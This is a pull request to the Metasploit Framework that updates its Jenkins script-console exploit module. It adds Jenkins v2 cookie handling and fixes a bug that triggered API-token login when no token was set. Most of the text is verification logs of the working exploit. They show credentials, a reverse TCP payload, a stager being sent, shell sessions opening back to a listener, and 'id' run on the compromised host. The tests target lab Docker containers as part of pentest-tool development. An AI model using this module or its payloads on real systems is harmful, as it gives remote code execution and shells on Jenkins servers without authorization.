### PR TITLE
Jenkins script console v2 support

### DIFF
--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @cookie = nil
     @crumb = nil
     if res.code != 200
-       if datastore['API_TOKEN']
+       if !datastore['API_TOKEN'].empty?
           print_status('Authenticating with token...')
           res = send_request_cgi({
             'method'    => 'GET',

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -180,7 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
           if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
             fail_with(Failure::NoAccess, 'Login failed')
           end
-          sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
+          if res.get_cookies.split('JSESSIONID').count > 2
+            sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[2].split('; ')[0]
+          else
+            sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
+          end
           @cookie = "#{sessionid}"
 
           res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})


### PR DESCRIPTION
Add support for Jenkins v2 which made a slight change to the cookie. Reference https://github.com/rapid7/metasploit-framework/pull/8627

Also fix bug which caused the `api_token` authentication method to be used (and subsequently fail) even if no `api_token` was set.

## Verification
### Jenkins 2.72 on Linux with Docker

```
Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD   Password2        no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.17.0.1       yes       The target address
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.105   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux



msf exploit(jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444 
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: 'f94aa2f9ceb40283f4a0564989c3b01d' (Jenkins-Crumb style)
[*] 172.17.0.1:8080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.56.1
[*] Command shell session 3 opened (192.168.56.105:4444 -> 192.168.56.1:34644) at 2017-08-09 12:02:50 -0400
[!] Deleting /tmp/6x6oXU4 payload file


id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

```


### Jenkins 1.566 on Linux with Docker

```
msf exploit(jenkins_script_console) > show options 

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD   Password2        no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.17.0.1       yes       The target address
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.105   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf exploit(jenkins_script_console) > unset api_token
Unsetting api_token...
msf exploit(jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444 
[*] Checking access to the script console
[*] Logging in...
[*] 172.17.0.1:8080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.56.1
[*] Command shell session 1 opened (192.168.56.105:4444 -> 192.168.56.1:35004) at 2017-08-09 12:21:45 -0400
[!] Deleting /tmp/7d2e payload file

id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

```

### Jenkins 1.566 on Linux with Docker using API Token
```
msf exploit(jenkins_script_console) > show options 

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting                   Required  Description
   ----       ---------------                   --------  -----------
   API_TOKEN  0f4276496e9f1c53dbeca043f3927dbb  no        The API token for the specified username
   PASSWORD                                     no        The password for the specified username
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.17.0.1                        yes       The target address
   RPORT      8080                              yes       The target port (TCP)
   SRVHOST    0.0.0.0                           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                              yes       The local port to listen on.
   SSL        false                             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                                 yes       The path to the Jenkins-CI application
   URIPATH                                      no        The URI to use for this exploit (default is random)
   USERNAME   admin                             no        The username to authenticate as
   VHOST                                        no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.105   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444 
[*] Checking access to the script console
[*] Authenticating with token...
[*] 172.17.0.1:8080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.56.1
[*] Command shell session 2 opened (192.168.56.105:4444 -> 192.168.56.1:35168) at 2017-08-09 12:51:02 -0400
[!] Deleting /tmp/6kCLGPR payload file

id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
```
